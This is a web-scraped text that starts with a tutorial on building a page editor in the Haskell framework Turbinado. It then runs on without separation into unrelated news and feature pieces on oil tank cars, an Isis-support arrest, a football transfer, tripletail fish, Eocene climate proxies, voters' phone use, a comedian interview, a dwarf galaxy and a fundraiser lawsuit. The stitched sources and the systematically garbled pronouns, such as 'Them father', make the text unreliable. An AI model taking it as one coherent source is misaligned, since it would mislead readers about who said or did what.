These are very early days for Turbinado , so much change is going on… But here 's a quick tutorial on putting together a poor man 's page editor/manager in Turbinado .
# # # Build Turbinado
* Warning ! * : With 6.10 's changes in dynamic plugins , Turbinado only builds with GHC 6.8 right now . Fixing this is next up in the dev queue .
You 'll need to have the following packages installed to have a go at installation :
– GHC 6.8 * ( darcs ) *
– haskell-src-exts * ( darcs ) *
– harp * ( darcs ) *
– hslogger * ( git ) *
– encoding * ( darcs ) *
– hsx * ( darcs ) *
– hs-plugins * ( darcs ) *
– http * ( darcs ) *
– HDBC * ( git ) *
– HDBC-PostgreSQL * ( git ) *
* * Grab the code * *
git clone git : //github.com/alsonkemp/turbinado.git
* * Build it * *
With all of the packages installed , wait for a new moon , stand on tip-toes , and do the following :
runghc Setup.lhs configure runghc Setup.lhs build
# # # Configure It
cp Config/App.hs.sample Config/App.hs cp Config/Routes.hs.sample Config/Routes.hs
Edit App.hs and Routes.hs to taste .
# # # Create the Page table
CREATE TABLE page ( title character varying NOT NULL , content text NOT NULL , _id character varying ( 255 ) NOT NULL PRIMARY KEY , ) ;
Updated : added PRIMARY KEY which is needed by the ORM generator .
# # # Generate the ORM models
runghc scripts/GenerateModels
You should now have an interesting file or two in App/Models . The files are organized as follows :
* App/Models/Bases/Comment.hs – all base Models inherit this .
* App/Models/Bases/AbcXyzType.hs – the representation of the database table * abc_xyz * . Do n't edit this ! It 's autogenerated and your changes will get ignored on the next gen .
* App/Models/Bases/AbcXyzFunctions.hs – CRUD functions on * abc_xyz * . Do n't edit this ! It 's autogenerated and your changes will get ignored on the next gen .
* App/Models/Bases/AbcXyzRelations.hs – functions on tables related to * abc_xyz * . Do n't edit this ! It 's autogenerated and your changes will get ignored on the next gen .
* App/Models/AbcXyz.hs – the user configurable area of the AbcXyz . By default this just imports the above three tables . All of your custom * find * , * insert * and * update * methods go here .
A big shout out to .netTiers for pointing the way on building a code-generator ORM .
# # # Create your Layout
Just as in Rails , the Layout usually defines the majority of your sites page structure . See here for the Layout used for turbinado.org .
# # # Create your Page controller
The controller handles the request and sets up ViewData for the View to render/display . This little Page controller has the following functions/methods/actions :
index : list all Pages .
show : render one Page .
new : display a blank Page form .
create : take the submission of the ‘ new ' action .
edit : display an existing Page in a form for editing .
save : take the submission of the ‘ edit ' action .
Full version here . Here 's a snippet :
-- 'id ' is an important function name in Haskell , so I use id ' for the Page 's `` id '' . There 's got -- to be a better solution -- This is the generated ORM for the 'page ' table in the database . import qualified App.Models.Page -- Index lists out all of the pages -- setViewDataValue is used to store data for retrieval by the View . Idea lifted from ASP.NET -- http : //msdn.microsoft.com/en-us/magazine/cc337884.aspx index : : Controller ( ) index = do pages < - App.Models.Page.findAll -- use ORM goodness to get all pages setViewDataValue `` pages-list '' $ map ( \p - > ( title p , _id p ) ) pages -- Show shows one page -- Notes : -- * The `` id '' is parsed from the request 's path and put into the Settings . -- See : http : //github.com/alsonkemp/turbinado-website/tree/master/Config/Routes.hs -- * getSetting returns a `` Maybe a '' . getSetting_u is the unsafe version and returns just the `` a '' . show : : Controller ( ) show = do id ' < - getSetting_u `` id '' p < - App.Models.Page.find id ' setViewDataValue `` page-title '' ( title p ) setViewDataValue `` page-content '' ( content p ) -- snip -- save : : Controller ( ) save = do id ' < - getSetting_u `` id '' _title < - getParam_u `` title '' _content < - getParam_u `` content '' p < - App.Models.Page.find id ' App.Models.Page.update p { title = _title , content = _content } redirectTo $ `` /Page/Show/ '' ++ id '
# # # Create Your Views
This Controller requires 4 views :
* Index
* Show
* New
* Edit – this could probably be the same as New .
See here for pre-built views . Here 's the “ Index ” view ( note : * this is n't very sugary and that makes me * * sad * * * ) :
page = < div > < h1 > Page Index < /h1 > < % do ls < - getViewDataValue_u `` pages-list '' : : View [ ( String , String ) ] mapM indexItem ls % > < /div > -- fugly , but I 'm still getting used to HSP-like templating indexItem ( t , i ) = return $ cdata $ unlines $ [ `` < div style='padding : 0pt 5px ; ' > '' , '' < a href=\ '' /Page/Show/ '' ++ i ++ '' \ '' > '' , '' `` ++ t , '' < /a > '' , '' < /div > '' ]
Here 's the “ Show ” view and it 's * pretty sugary * :
page = < div > < h1 > < % getViewDataValue_u `` page-title '' : : View String % > < /h1 > < % getViewDataValue_u `` page-content '' : : View String % > < /div >
# # # Run It
Start up Turbinado :
dist/build/turbinado/turbinado -p 1111
Browse to it : http : //localhost:1111/Page/Index ( it 'll take a couple of seconds to compile the Model , Controller and View )
# # # Examples !
There 's still lots of work to do on the ORM and on Documentation . As the code base matures , both should progress . Examples are a nice way to drive development forward and to engage the community , so let me know if you 'd like to see anything in particular demonstrated and I 'll try to implement it .
“ We will not remove any unsafe oil rail cars from service. ” That was the upshot of oil industry testimony at a recent rail safety hearing before the US Senate .
To be fair , that is n't a direct quote . But it is a direct consequence of the math .
Under questioning from Senators about the wisdom of continuing to use older unsafe tank cars to haul crude oil—especially the very volatile crude coming out of North Dakota—the American Petroleum Institute representative testified that tank cars built to the newer standard , called “ CPC 1232 ” would make up “ sixty percent [ of the oil tank car fleet ] by the end of 2015. ” It 's a good sound bite—and it certainly reinforces industry PR that everyone is busy making oil-by-rail as safe as possible—but it is also misleading . Dangerously so .
In fact , on the very same day as the Senate hearing , another oil industry representative provided a more complete picture to the US Surface Transportation Board 's ( STB ) rail energy transportation advisory committee .
The oil industry presentation for the STB provided detailed information on the composition of the nation 's oil tank car fleet—the number of newer-standard tank cars alongside the total number of tank cars that were rolling at the end of 2013 and that are projected to be on the rails by 2015 . A bit of simple arithmetic yields the number of legacy tank cars—the outdated and obviously unsafe ones—that the industry expects to be in service hauling crude oil .
What the oil industry is showing here , but not necessarily talking about , is that they expect a surge in shipments of volatile shale oil from North Dakota and other areas . More precisely , they believe that they will need 84 percent more tank cars by the end of 2015 to haul the coming flood of crude oil . And to accommodate all that oil , the industry expects to keep every one of the 25,806 legacy DOT-111 oil tank cars in service through at least the end of 2015 . ( The tank car numbers here are consistent with data the industry has provided in other documents . See for example , Table 2 in the Rail Safety Institute 's written testimony on tank car standards recently submitted to the federal government . )
Finding this article interesting ? Donate now to support our independent research !
In short , according to the oil industry 's own numbers , they will not retire any unsafe older crude oil rail cars in the near future . That makes for a different sound bite , does n't it ?
The percentage of newer tank cars in the overall fleet is irrelevant until it starts to approach 100 percent because it does nothing to reduce the chances of an older tank car blowing up . Worse yet , the presence of older tank cars actually renders the newer tank cars unsafe too . According to federal investigators at the National Transportation Safety Board , the “ safety benefits [ are ] not realized if old and new tank cars are commingled , ” as they inevitably will be .
There is an alternative . Instead of exposing communities to the ongoing threat of unsafe oil trains , we could choose to ship crude only in safer new-model tank cars—even if it means leaving some of our newfound oil reserves in the ground .
Postscript . In this article we refer to the CPC 1232 standard for rail cars as better than what was on the books previously . That 's true , but even these newer tank cars are seriously flawed . The National Transportation Safety Board ( NTSB ) is not convinced that they “ offer significant safety improvements. ” They also still have bottom outlet valves , “ which have been prone to failure in derailment accidents. ” And as we pointed out , the “ safety benefits [ are ] not realized if old and new tank cars are commingled . ”
Image copyright Getty Images Image caption Shannon Conley was arrested as they tried to board a flight at Denver International
A 19-year-old woman has been arrested for allegedly trying to provide support to Islamic State of Syria and the Levant ( Isis ) , it has emerged .
Shannon Maureen Conley , from Denver , was arrested in April as they attempted to board a flight , according to recently unsealed court documents .
They told officials they were flying to Turkey and then to Syria to meet a suitor they met online .
The man , a Tunisian , claimed to be an active member of Isis .
According to a criminal complaint filed with the US District Court in Colorado , Ms Conley attended a military tactic and firearms training course with the US Army Explorers earlier in the year .
They allegedly planned to use the training to help Isis fighters through the man they met online , who shared their `` view of Islam as requiring participation in violent jihad against any non-believers '' , the complaint said .
Officials began to investigate Ms Conley after the pastor at Faith Bible Chapel in Arvada , Colorado , alerted local police and the Colorado FBI to a woman suspiciously taking notes of the layout of the church 's campus .
The church had been the scene of an earlier deadly shooting in 2007 .
Image copyright AP Image caption Isis is consolidating its hold on power in the parts of Syria and Iraq which it controls
According to court documents , Ms Conley , a Muslim convert , told investigators they had initially taken classes at the church to learn about different religions .
But church staff followed them around , they told officials , and they did not like the church 's vocal support for Israel .
They allegedly told investigators : `` If they think I 'm a terrorist , I 'll give them something to think I am , '' according to the complaint .
Federal agents encouraged Ms Conley 's parents to get them to meet elders at their mosque to find more moderate options . Officials said their parents were apparently unaware of them extremism .
Them father told an official they had declined a Tunisian man 's request for a blessing to marry their daughter , and the couple were surprised by their refusal .
Four days before their arrest , they allegedly told agents that nothing they could do would change their mind to fly to Turkey .
They stopped them as they were walking on to the plane .
Former Newcastle United striker joins until the end of the season
The former England U21 and Nigerian international has joined the Cod Army until the end of the season.Ameobi , who has made 298 appearances in the Premier League for both Newcastle United and Crystal Palace , will bring a wealth of experience to the Cod Army squad.The 6 ” 3 striker has even scored for the Magpies in the Champions League against FC Barcelona and was recently playing regular first team football at Bolton Wanderers.Shola turned down different offers in favour of a move to the Fylde Coast and manager Steven Pressley is delighted to have the frontman on board.He said : “ In January we signed a number of younger players and it was vital to the group that we brought in a player with experience. “ We certainly could n't get any more experience than Shola Ameobi and we are absolutely delighted with that . They are not only a very good player ; they are a terrific character that can bring a lot to the group. “ It is vital that they have been playing as sometimes unattached players at this stage in the season , the one thing they are lacking is a level of fitness. “ Shola has been involved at Bolton Wanderers on a regular basis for the vast majority of the season and they are raring to go ahead of Saturday 's trip to Port Vale . ”
Dumas tripletail
Capt . Eric Dumas tagged and released about 50 tripletails last summer while fishing Lake Borgne and Mississippi Sound . One of the fish was recaptured on Christmas Day in Florida . ( Eric Dumas photo )
When the unblinking heat of the summer sun practically boils the waters of Lake Borgne , Capt . Eric Dumas continues to guide anglers to excellent speckled trout action , but they seldom can resist the urge to run crab-trap lines in search of tripletail , a mysterious fish that few even considered targeting in Louisiana 's inshore waters only a couple of decades ago .
Offshore anglers have known forever that tripletail is the best-tasting fish in the salty sea , but it was always an incidental catch rather than something anglers went out to target .
Because of that , there has n't been a whole lot of biological studies on tripletail . In 2014 , the Louisiana Wildlife and Fisheries Commission implemented an 18-inch size minimum and five-fish bag limit on the fish , but it was a more precautionary measure than anything . Biologists at the Louisiana Department of Wildlife and Fisheries had made no limit recommendations for the fish .
No one 's entirely sure where Lake Borgne 's tripletail come from , or how long they 've been migrating into the waterbody , but thanks to Dumas , anglers and biologists now have some idea where they go when they leave .
Last summer , Dumas tagged about 50 tripletails through the TAG Louisiana program .
`` It was a good year for them last year , '' Dumas said . `` It was the best I 've seen in a while . ''
Of the tripletail Dumas tagged , only one was reported as having been recaptured , but that fish gave significant clues about the migration habits of these fish .
Dumas tagged the fish on July 10 near Three Mile Pass , just outside of Lake Borgne . At 17.75 inches , it was too small to legally keep , so Dumas revived it and sent it on its way .
The fish remained at-large until Christmas Day , when angler Walter Harris recaptured it near Marco Island , Fla. , which is between Charlotte Harbor and Key West . The fish had traveled an incredible 543 miles and grown to 18 1/2 inches during its 168 days at-large . That 's 3 1/4 miles of migration every day it was at sea .
Tripletail typically leave Lake Borgne after the passage of the fall 's first significant cold front , and they do n't return again until water temperatures warm in the late spring or early summer .
Dumas , for one , ca n't wait to see them again , especially now that they know a little more about their favorite fish .
Tasty offshore fish again in Lake Borgne Tripletail thriving in warm , bait-rich waters .
* * * * * * * * * * * * * *
Todd Masson can be reached at tmasson @ nola.com or 504.232.3054 .
Follow @ TmassonFISH Tweet to @ TmassonFISH
Scientists from the Alfred Wegener Institute Helmholtz Centre for Polar and Marine Research ( AWI ) have overcome a seeming weakness of global climate models . They had previously not been able to simulate the extreme warm period of the Eocene . One aspect of this era that particularly draws interests to climatologists : It was the only phase in recent history when greenhouse gas concentration was as high as researchers predict it to be for the future . The AWI scientists have now found that the apparent model weakness is due to a misinterpretation of the temperature indicator TEX86 . These molecules , which are produced by archaea do not record the surface temperature of the ancient ocean as expected , but rather the temperature of water depths up to 500 metres . In the current issue of the journal Nature Geoscience , the scientists report on this new finding which has now made it possible to correctly simulate the temperature distribution of the Eocene in climate models .
Climate scientists often hear the same complaint : How can climate models accurately predict the future of our planet if it is not even possible to correctly reproduce the climate of the past ? One of the unsolved problems was that all previous attempts to simulate the extreme temperatures of the Eocene with climate models failed .
At that time , 49 to 55 million years ago , the carbon dioxide content of the air was likely more than 1000 ppm ( parts per million ) -- i.e . at least two times the current greenhouse gas concentration . The earth warmed up so strongly that the icesheets on Greenland and Antarctica disappeared . Instead of ice crystals , palm trees grew there . `` Until recently , we believed that the sea surface temperature near the North Pole at the time was 23 degrees Celsius ; in Antarctica , it was believed to have been more than 30 degrees Celsius , '' says Dr Thomas Laepple , climate researcher at the AWI Potsdam .
These temperature estimates were based on data from the climate indicator TEX86 . This abbreviation stands for a ratio of specific organic compounds produced by archaea , depending on the water temperature in which they lived . `` Archaea are unicellular organisms that can in part withstand surprisingly high ambient temperatures . The molecules of the organisms that were living at that time are still preserved in the sedimentary layers of the seafloor . They are one of our most important archives for warm climate conditions , but as we have seen , we decoded them wrongly in the past , '' says Thomas Laepple .
They and their AWI colleague at the time , Sze Ling Ho , first had doubts about the interpretation of the TEX86 temperature indicator during a comparison of climate data from the most recent ice age . The scientists noticed that the TEX86 temperatures were far too cold compared to other geological evidence . `` The discrepancy was so obvious that we started to review the TEX86 values of around 3,000 sediment samples from different ocean basins and from different epochs of the Earth . It soon became apparent that the average temperature change inferred from TEX86 was exaggerated , always and on all time scales , by one and a half to two times . The temperature it showed for cold periods was much too cold and the one for warm periods was much too warm , '' explains geochemist Sze Ling Ho .
The cause of this pattern had to be of a fundamental nature , a suspicion that was confirmed upon closer analysis . `` TEX86 had previously been interpreted as an indicator of sea surface temperature , in spite the fact that the archaea that produce TEX86 rarely directly live at the sea surface . Through the comparison with other climate archives , we have been able to constrain the depth in which the TEX86 signal is produced . We now assume that TEX86 represents the water temperature at a depth of up to 500 metres , '' Sze Ling Ho explains .
At this water depth , the temperature difference between the tropical oceans and the polar seas is smaller than at the surface . This has direct consequences for climate reconstruction , since the information generated from the indicator is differently translated into temperature values . `` In practice , the TEX86 extreme values need to be roughly halved in the climate reconstructions . Comparing the corrected temperatures with the models shows that they now reflect the climate of the Eocene in a realistic and physically consistent way , '' explains Thomas Laepple .
However , we also have to correct our temperature-conception of the Eocene . Thomas Laepple : `` The era remains the warmest period of the past 65 million years . The water temperatures that we assumed for the Arctic and Antarctica , though , were overstated by at least ten degrees Celsius . Now , we know that the water in the Southern Ocean had a temperature of about 20 to 25 degrees Celsius at that time . The region was therefore still warm enough for there to be palm trees sprouting on the beach . ''
Story highlights Report : Nine out of 10 U.S. voters have a cell phone and almost half are smartphones
Forty percent of conservatives , 56 % of liberals and 55 % of moderates had smartphones
Few voters -- 5 % -- subscribed to get text messages from political campaigns
The report is from the Pew Internet & American Life Project
Nearly nine out of 10 registered U.S. voters own a cell phone -- almost half of which are smartphones . And many voters are using cell phones to get and share election information or news .
By and large , however , they 're not using their phones to connect directly with candidates , parties or interest groups , according to a new report by the Pew Internet & American Life Project .
In September , Pew surveyed more than 1,000 U.S. adults and found that -- even though text messaging is generally the most popular thing people do with their phones ( other than talking ) -- texting does n't appear to be hugely popular in relation to this year 's election . This year , fewer than one in five mobile-enabled voters have sent campaign-related text messages to people they know , and only 5 % had subscribed to receive text messages directly from a candidate or other group involved in the election .
Furthermore , while 45 % of cell-owning registered voters use smartphone apps , only 8 % use apps that come from a campaign , political party or interest group .
Overall , self-designated political conservatives appear to be the least advanced , and active , when it comes to mobile technology . Pew found that while liberal , conservative and independent voters are equally likely to own a cell phone , only 40 % of conservative voters own a smartphone , significantly fewer than liberal ( 56 % ) or moderate ( 55 % ) voters . Also , only 68 % of conservatives use text messaging , compared to 78 % of moderates and 81 % of liberals .
Getting news is a popular election-related activity : 27 % of cell phone-owning voters do this , especially those under age 50 . Liberals ( 37 % ) are more likely to get election or political news on their phones than moderates ( 28 % ) or conservatives ( 25 % ) .
But mobile social media is even more popular . Nearly half of smartphone-owning registered voters told Pew that they have used their phone to read others ' social media comments about a candidate or the campaign in general . But substantially fewer ( 18 % ) make political or election-related social media comments from their phones .
Over a third of smartphone-owning voters use their phones to check whether something they just heard about a candidate or campaign was true . Pew noted that the survey sample size was n't large enough for a detailed analysis of whether Republicans , Democrats , liberals , conservatives or moderates were most likely to do this kind of on-the-spot fact checking .
The opinions expressed in this post are solely those of Amy Gahran .
The last time we spoke with Chris Gethard , the veteran UCB man and longtime New York stand-up was preparing for a Judd Apatow-backed HBO special—a `` big break '' for a guy probably best known for their eponymous cult variety show that spent years on New York 's public access .
Now , after a brief stint at Fusion , The Chris Gethard Show is moving to truTV , returning to its live broadcast roots and bringing its brand of haphazard comedy anarchy to a national audience . It 's a trainwreck waiting to happen , according to the host himself , but that 's the whole idea . On the morning of the show 's premiere , we caught up with Chris Gethard to talk about David Letterman 's trash , imposter syndrome , and the exceptional , enduring weirdness of New York comedy .
So , in 12 hours The Chris Gethard Show will be broadcast live to a national TV audience for the first time ? Are you nervous at all ? Trying not think about it to be honest .
Should I not ask about it ? We could talk about something else ? Yeah if we could talk about anything else , actually . No but really , there are some nerves about how it 's going to go on a platform this far-reaching . There 's a lot of people who 've never seen this thing that we 've been doing for eight years and I 'm wondering how they 're going to react to it . There 's also a lot of people who 've found me in the years since we 've done the show . I 'm wondering what fans of my podcast and my HBO special are going to think , because it 's such a different thing . So there are some nerves with that stuff .
But as far as actually getting up and executing the show , one thing I 've found just with dealing with it for almost a decade in some form or another , is that myself and the people involved in it really take a lot of confidence from each other . It just feels good to have the gang back together , and if it fails , it fails . We 've been lucky to do it this long , so we 're going to go out there and do what we 've always done , and if it falls on its face , it falls on its face . I have to just be OK with that , so that helps swallow the nerves .
The exciting thing , from the audience 's perspective at least , is that if it falls on its face , we get to watch that happen live . That 's the real experiment , right ? I do not guarantee it 'll be a good show . But if it 's a bad show , I promise to make it such a disaster that you like that even better . I think people are ready for it . My gut instinct is that people like watching others suffer and deal with failure on live television . In my mind that 's good , watchable TV .
What about truTV 's mind though ? How 'd you get the network to come around to the idea that this bizarre variety/call-in show—a show where you 're liable to have a shirtless beef-off or an appearance from a teenage Twitter nemesis—should be broadcast live ( albeit with a 10 second delay ) ? I was blown away . It was actually their idea to do it live again . When we originally signed our deal with them it was for an edited taped show , and in my mind it was a pipe dream to do it live . I never thought we 'd be able to go live again . But they brought me out to a lunch and it was with all the heads of the network , and they were like , `` Hey , we 've been thinking , do you want to do it live again ? '' I was like , `` That 's a really great idea , '' but immediately in my head I was like : Uh , that might be a really terrible idea for you guys .
And I 'm driven so much by my Catholic guilt and anxiety that I actually started feeling like it was n't responsible to take these people 's money and not be upfront about this , so I actually said to Marissa Ronca , one of the higher-ups , `` You know , a decent number of these are going to be total trainwrecks , right ? '' They were like , `` Yeah we think those are going to be people 's favorite ones . '' So , who knew , after all these years that someone would actually believe in it at its most core basic level , that failure is part of the process and not hiding our flaws might actually make people feel like they could connect with it better . It 's really bizarre .
When we crossed paths at a press event earlier this week , you were talking about how this is a New York show at its core , and that this new season and format would be `` more New York than ever . '' Could you elaborate on that a bit ? Yeah , I 'm so thrilled about this . First of all , we were on New York public access for years . We spent almost half a decade there , on this hugely liberating creative platform at the Manhattan Neighborhood Network , which was just by far the most creatively fruitful time in my life .
Beyond that , it was really cool to realize that New Yorkers were actually watching us on public access . I 'd always thought that people just flipped through those channels , but I 'll never forget , I was walking through Washington Square Park with my now-wife , and some guy walked by us and was just like `` Hey , Chris , what 's up ? '' And my wife pointed out that I was becoming one of those New York guys where people feel like they know you , all because of public access . There were two different times in my life where I was walking with David Bluvband , who plays the Human Fish on our show , and people recognized them and not me . One time some guy came up to us on 8th Avenue , and they were like , `` You play the fish guy on that show , right ? '' They did n't even recognize me from my show . Another time , some guy was walking across the street from us , kind of shady-looking due , and they were like `` I know you , I know you . '' I was looking at Dave and we were trying to figure out if they were going to fight us , and this guy just yells out , `` You 're the motherfucking fish-man , '' then jumps in their car and drives away .
There 's like this weird culture in New York , and this appreciation for public access that I did n't know existed . Fusion kept us alive—I 'll never sneeze at that—but one of the things that was frustrating for us is that they were n't carried on Time Warner ( now Spectrum ) so New York , which was originally the one place you could see us on TV , was all of a sudden the one place you could n't see us on TV .
I 'm so happy to be back and have New Yorkers be able to watch the show again . I want to double down on that . We are a New York show in a big way . I always think of Letterman as a massively New York show . I think of Conan 's New York days . So I 'm proud that I 've kept it here . A huge part of why I 've never moved to Los Angeles is New York 's creativity and the weirdness and appreciation for the bizarre counter-culture stuff .
`` I think the rumors that New York is n't weird anymore are vastly overrated . I still think there 's a lot of weird , cool stuff and I want to get out there and point a camera at it on live TV . ''
Well , we 've now got this camera system that I 'm so excited to play with . Basically a guy with a camera and a backpack full of modems , and we can broadcast live and just cut to that on the streets of New York . I plan on utilizing that pretty much every episode to do something that takes place on the streets of New York . If you 're on the street between 11 p.m. and midnight on a Thursday , and you see a very sweaty camera man carrying a giant backpack and a camera , odds are , if you jump in front of him , you 'll be on The Chris Gethard Show that night . Our studio 's on 37th street , so it 's like we 're close to Bryant Park , we 're close to the steps of the library , we 're close to the Empire State building . We 're going to find the places with foot traffic , people hanging out at night , just total weirdos .
I think the rumors that New York is n't weird anymore are vastly overrated . I still think there 's a lot of weird , cool stuff and I want to get out there and point a camera at it on live TV . Totally uncensored too , they ca n't edit it out . This idea that New York is lame—no way , no way . I want to put the weirdness in New York back on TV , in the middle of August heat , in the middle of the night , we 're going to find some oddballs .
You 've also written about the differing approaches to experimental , boundary-pushing comedy in New York and Los Angeles . What 's your take on the city 's comedy scene right now ? You know the comedy scene in New York is just so strong . There 's always these waves of exodus where comedians head to L.A .. I get it . There are tons of opportunity out there , it 's relaxed , you get more space . But creatively , if you 're looking to be experimental , if you 're looking to go big , I just believe in my heart that New York City can not be topped . I want to embrace that and celebrate that on this show .
Beyond comedy , you have roots in the city 's DIY music scene , and I 've always felt the show has had an impressive grasp on up-and-coming artists in New York , and has given platforms to bands that you do n't necessarily expect to see on television . What can we expect from the musical guests this year ? I 'm always so thrilled with our music bookings . You know , we are a low-budget show at the end of the day , we always have been , but our music booking is the one thing I get cocky about it . I feel like when it comes to actual underground stuff , our bookers do a better job than anyone . We 've got a lot of people confirmed this year—I do n't know how much I 'm supposed to announce , but I also kind of do n't care .
One of the things I always loved with the show is that music booking gives me the excuse to have on some people who 've been heroes to me in the past . Last season we had Kool Keith and They Might Be Giants on , which was so rad . This season we have Atom and Their Package , who was one of my heroes in high school . We have Bash & Pop , which is Tommy Stinson 's newly reformed band . I hear RVIVR is coming . Pup is coming . We 've got a lot of cool acts coming down the pipe . Our music can not be trifled with , and I challenge anyone to say otherwise .
I also had a chance to see the new set during a press tour earlier this week . It definitely looks like a sweaty DIY basement space , even more so then it did in the public access days . Our set is comprised mostly of actual garbage that our fans sent us . And we did want it to feel really DIY , but then you get into a rumor that it 's being brainstormed with development people and set designers , and it kind of becomes a cartoonish thing . But being that I 'm someone who actually spends time in DIY spaces , well you do n't want a fake version of that . We decided if we wanted it to feel like someone 's basement with people just hanging out , we could just have people mail us actual stuff from their basements , and make our whole set out of that . We also stole big hunks of David Letterman 's set , so we even have David Letterman 's garbage , which is nice .
It does sort of feel like someone could be living there . But you also have an actual home in New York , presumably ? I actually just bought a co-op out in Queens . Me and the wife were living in Brooklyn , but we wanted to buy a place , and turns out that 's completely impossible in Brooklyn . If you 're an artist on artist wages , even as someone who 's having a good couple of years , buying in Brooklyn just is n't happening . So we have a little co-op out in Jackson Heights , which is a beautiful neighborhood that I 'm pretty obsessed with . Although when we renovated , it was like eight weeks of living without a toilet and shower , which was pretty rough .
But I love the neighborhood . You never know who you 're going to run into . The amount of different people just on top of each other in the streets , it 's really inspiring . I also really love that it 's like a lot of hustlers . There 's a lot of people figuring out their grind out in Queens , and it works really well for me . It 's a good reminder for me to always work hard .
You 've long been considered one of the hardest-working comics in New York , and it seems like your output grows every year . How do keep up that energy after so long in the scene ? My system has always kind of been that I work as hard as I can until I have a panic attack . Then I take some time off and rebuild my life . And I know that 's a sad answer , but it 's a truthful one .
I 've been going pretty hard for the past couple years , and a lot of that is paranoia , because I 've never been the funniest comedian in the room . When I started at UCB 17 years ago , right away I was like , man , there are people that are just powerhouses . What do I have ? Well I have the fact that I 'm willing to be really honest and I have the fact that I can just work harder than anyone else . So if the next guy is working harder than I am , then that person deserves everything and I do n't deserve shit . My philosophy has always been that I 'm not good enough at this to slack off , like I 'm not funny enough or talented enough to take a day off . Especially with the opportunities I 've had in the past year or two , I 'm smart enough to know it 's going to go away at some point . That 's not self-defeatism , that 's realistic . For most artists , it 's not a long career , so everything I want to do I better do now .
Our show debuts on truTv tonight and I hope it 's really great and it leads to hundreds of episodes and years of critical success and a growing audience , but it could also mean that tomorrow morning they 're like , `` Hey this was a bad idea . We 're out . '' I 'm very , very lucky to do what I do—I think about that everyday—I 'm also well aware it could end tomorrow . Who knows ?
Give us the elevator pitch for why everyone should be watching The Chris Gethard Show ? At the end of the day , I think it 's a talk show that 's not scared to fail . It 's TV that 's not trying to pretend everything 's perfect all the time . It 's not overproduced . You see us make mistakes . On top of that it 's really funny . You get to see some people you 've seen in movies doing things you do n't expect them to do . It 's a show made by real people that tries to resemble real life in ways—it 's absurd and it 's strange but at the same time I think , quietly , you 're not going to find a realer show on television .
The Chris Gethard Show ( season 3 ) premieres on Thursday August 3rd at 11 p.m. EST on truTV .
Enlarge Image ESA/Hubble & NASA
It 's not really a particularly well-known galaxy , but NGC 4861 sure is interesting . It 's located 30 million light-years away from Earth , in the small , northern hemisphere constellation of Canes Venatici ( the Hunting Dogs ) , a location in which a number of interesting deep-space objects can be found .
NGC 4861 is small , too , a dwarf galaxy that astronomers are still trying to classify . It has some spiral galaxy physical properties , such as its size , mass and rotational velocity . But it 's also , as you can see in this image released by the European Space Agency , a bit like a comet , with a long , trailing tail of gas and stars .
This is more consistent with an irregular dwarf galaxy .
It 's also interesting because it 's what is known as a starburst galaxy , a galaxy with a very high rate of star formation . And not just any stars ; NGC 4861 has a high number of a rare type of star called Wolf-Rayet stars , stars that are extremely massive when young , at least 20 times the mass of the sun . They are also extremely hot and extremely bright , with surface temperatures ranging between 30,000 and 200,000 Kelvin ( the Sun 's surface temperature is around 5,778 Kelvin ) .
This furious light and heat comes at a price . They also lose mass at an accelerated rate , with the intense radiation pressure driving powerful solar winds . They do n't live long in comparison to other stars , and are thought to explode dramatically in a stunning supernova when their time is up .
This makes NGC 4861 what is known as a Wolf-Rayet starburst galaxy . According to the ESA , these galaxies are great to study , because they are so small that matter moves around in them quite easily compared to other galaxies ; there is less mass , which means less gravity holding everything together .
This means the stellar winds produced by the Wolf-Rayet stars , in birth , life and spectacular supernova , would in theory join what is known as a galactic wind , which blows charged particles out of galaxies into the interstellar medium . NGC 4861 should be a perfect candidate for studying this wind , except for one problem : recent studies have n't found it .
This does n't mean it is n't there , though . Galactic winds are hard to observe , because the density of material is very low , which means their optical emission lines and x-ray emission lines are both difficult to detect .
If you 'd like a wallpaper-sized version of this image , you can grab it here .
Batteries Not Included : The CNET team shares experiences that remind us why tech stuff is cool .
CNET Magazine : Check out a sampling of the stories you 'll find in CNET 's newsstand edition .
AGAWAM -- A teenager who was paralyzed after being struck by a hit-and-run driver in Agawam is suing their father for allegedly blowing through money raised for the teen 's recovery .
The civil suit pits Alex Scafuri , now 18 , against their father and stepmother , Christopher and Jennifer Scafuri , as well as two other defendants . The complaint , filed in Hampden Superior Court , demands a jury trial and is seeking financial damages for an amount to be determined .
The lawsuit claims well over $ 100,000 was raised at charitable events and through an online fundraising site for the recovery of Alexander Michael Branton-Scafuri , who was struck by a drunken driver in the area of Rowley and Springfield streets on the evening of March 16 , 2015 .
The driver , Jomaris Colon of Springfield , testified during criminal proceedings that they had no memory of the crash . In August 2016 , a Hampden Superior Court judge sentenced Colon to up to four years in state prison after they pleaded guilty to driving under the influence of alcohol and causing serious bodily injury to Scafuri , who was 16 at the time and paralyzed from the chest down .
In September 2016 , two months before Scafuri 's 18th birthday , a legal demand was sent to Christopher Scafuri and co-defendant Dawn Violette for an accounting of how much money remained in the fundraising accounts established on Alex 's behalf , including proceeds from an event at a local social club and a fundraiser conducted through the online site GoFundMe .
Neither Christopher Scafuri nor Violette gave an accounting of the funds , according to Dennis P. Powers , the attorney representing Alex Scafuri . Violette , Christopher and Jennifer Scafuri , and Maria Gensheimer are all named as defendants in the suit , because each had held `` funds for the benefit of the plaintiff while they were a minor , '' the complaint alleges .
Vigil held for Alex Scafuri , Agawam teen critically injured by alleged drunken driver from Springfield
Alex sustained neck injuries in the hit-and-run incident that led to their paralysis . They received extensive treatment for their injuries and incurred medical bills of around $ 960,000 , according to the complaint .
Scafuri was told by the various defendants that one fundraiser had collected between $ 60,000 and $ 120,000 , while the GoFundMe account had raised around $ 50,000 , according to the lawsuit . Using these estimates , that means anywhere from $ 110,000 to $ 170,000 was raised for Alex , whose father maintains that the total was closer to the smaller amount .
In June 2015 , Christopher Scafuri told their son that they had used around $ 37,000 to improve their property to make it handicapped-accessible . The father also told their son that they had used some of the money `` for daily living expenses for their family , '' including bills and mortgage payments , but had locked away around $ 40,000 in their safe , the complaint alleges .
In August 2016 , when Alex was still a minor , they were removed from their father 's Agawam home by the state Division of Children and Families `` due to allegations of neglect , '' the complaint states .
The next month , Alex was told by their father that there was only around $ 11,000 left in their account , according to the lawsuit , which alleges Christopher Scafuri had a fiduciary obligation to manage their son 's funds and had `` breached that duty '' by using money `` for their own benefit . ''
Agawam community shows ongoing support for teenage hit-and-run victim Alex Scafuri
Christopher Scafuri , in a sworn statement , said they never `` maintained custody or control over any funds raised for and/or donated on the plaintiff 's behalf . '' Any donations made on their son 's behalf were deposited into a bank account maintained by Violette , they said .
`` I did not participate in maintaining the account and do not possess any records pertaining to the account , '' they said .
